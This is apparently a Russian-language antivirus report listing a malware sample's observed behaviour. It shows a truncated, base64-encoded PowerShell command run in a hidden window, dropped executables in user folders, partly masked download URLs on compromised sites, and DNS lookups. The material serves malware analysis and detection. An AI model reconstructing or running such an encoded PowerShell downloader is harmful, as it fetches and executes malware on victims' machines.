Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEEAQQBBAHgAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFUAQQBEAEIAQQBvACcALAAnAGsAQQAnACkAOwAkAHYAVQBBAEIAQQBfAD0ALgAoACcAbgBlACcAKwAnAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIAAoAC...
- %TEMP%\1175623.cvr
- %HOMEPATH%\431.exe
- %HOMEPATH%\431.exe
- 'hc##ed.com':80
- 'i9####adio.com.br':80
- 'hc###t.com.br':80
- 'hn##.net':80
- '94.##6.40.51':80
- http://hc##ed.com/aspnet_client/C_Nh/
- http://www.hc##ed.com/aspnet_client/C_Nh/
- http://i9####adio.com.br/cgi-bin/N_13/
- http://hc###t.com.br/wp-content/4_C/
- http://www.hc###t.com.br/wp-content/4_C/
- http://hn##.net/Og_K8/
- http://94.##6.40.51/hnuk.net/index.html
- DNS ASK hc##ed.com
- DNS ASK i9####adio.com.br
- DNS ASK hc###t.com.br
- DNS ASK hy#####nsolutions.net
- DNS ASK hn##.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEEAQQBBAHgAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFUAQQBEAEIAQQBvACcALAAnAGsAQQAnACkAOwAkAHYAVQBBAEIAQQBfAD0ALgAoACcAbgBlACcAKwAnAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIAAoAC...' (со скрытым окном)